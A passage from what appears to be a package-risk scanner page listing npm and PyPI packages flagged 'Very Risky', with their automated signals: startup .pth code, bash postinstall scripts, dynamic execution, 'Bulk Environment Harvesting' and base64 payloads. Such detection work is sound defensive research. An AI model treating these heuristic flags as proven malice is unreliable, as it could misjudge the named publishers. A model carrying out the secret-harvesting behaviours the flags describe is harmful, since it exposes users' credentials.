  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo', 'addons'));ie = os.path.exists(os'
  • HIGHSYNTAX_ERROR_IN_odoo/addons/base_phone/wizard/number_not_found.py: multiple exception types must be parenthesized (<unknown>, line 64)
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo',));ie = os.path.exists(os.path.joi'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo',));ie = os.path.exists(os.path.joi'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo', 'addons'));ie = os.path.exists(os'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo', 'addons'));ie = os.path.exists(os'
  • SYNTAX_ERROR_IN_odoo/addons/base_phone/wizard/number_not_found.py: multiple exception types must be parenthesized (<unknown>, line 64)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
150 61d 0 172,241 ↑0.0/day
Very Risky
negotium npm 0.11.0 🪝
Claimed homepage: https://github.com/maestrojeong/negotium#readme
Matched naming pattern: npm-negotium-general
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 61
Code-only verdict: SUSPICIOUS (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 172241 lines, 6.8 MB across 464 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHPackage registered recently (54 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node install-browser-rs.mjs && node install-bash-rs.mjs'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/agent-helpers.js:230 (+19 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/agent-helpers.js:11907 (+11 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/agent-helpers.js:120 (+50 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in package/dist/agent-helpers.js:5798 (+4 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/main.js:47737
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node install-browser-rs.mjs && node install-bash-rs.mjs'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/agent-helpers.js:230 (+19 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/agent-helpers.js:11907 (+11 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/agent-helpers.js:120 (+50 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in package/dist/agent-helpers.js:5798 (+4 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/main.js:47737

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
150 223d 292 30,123 ↑1.3/day
Very Risky
claude npm 1.3.17 happy-nut 🪝
Claimed homepage: https://github.com/happy-nut/claude-plugin-viban#readme
Matched naming pattern: claude-claude-viban
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 223
Code-only verdict: SUSPICIOUS (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 292/month, 73/week (MODERATE_USAGE)
Codebase size: 30123 lines, 1.2 MB across 32 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 217 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'bash scripts/check-deps.sh || true'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • INFOSubstantial functional codebase (30123 LOC across 32 file(s)).
  • INFOModerate community usage with 292 monthly downloads.
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'bash scripts/check-deps.sh || true'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
150 1229d 14 72 ↑0.0/day
Very Risky
google pypi 0.1.0 unik128@gmail.com gmail.com 🪝 📦
Claimed homepage: https://pypi.org/project/google-form-api/
Matched naming pattern: google-google-api
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 1229
Registry downloads: 14/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 72 lines, 3.4 kB across 3 files (TINY_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'unik128@gmail.com' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 1223 days ago (predates modern AI hallucination waves).
  • HIGHPYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: google_form_api-0.1.0/venv/Lib/site-packages/_virtualenv.pth
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in google_form_api-0.1.0/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in google_form_api-0.1.0/venv/Scripts/activate_this.py:20
  • HIGHBUNDLED_NATIVE_BINARY: Unexpected compiled binary 'google_form_api-0.1.0/venv/Scripts/normalizer.exe' in package archive
Static code signals:
  • PYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: google_form_api-0.1.0/venv/Lib/site-packages/_virtualenv.pth
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in google_form_api-0.1.0/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in google_form_api-0.1.0/venv/Scripts/activate_this.py:20
  • BUNDLED_NATIVE_BINARY: Unexpected compiled binary 'google_form_api-0.1.0/venv/Scripts/normalizer.exe' in package archive

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →

LINK COPIED TO CLIPBOARD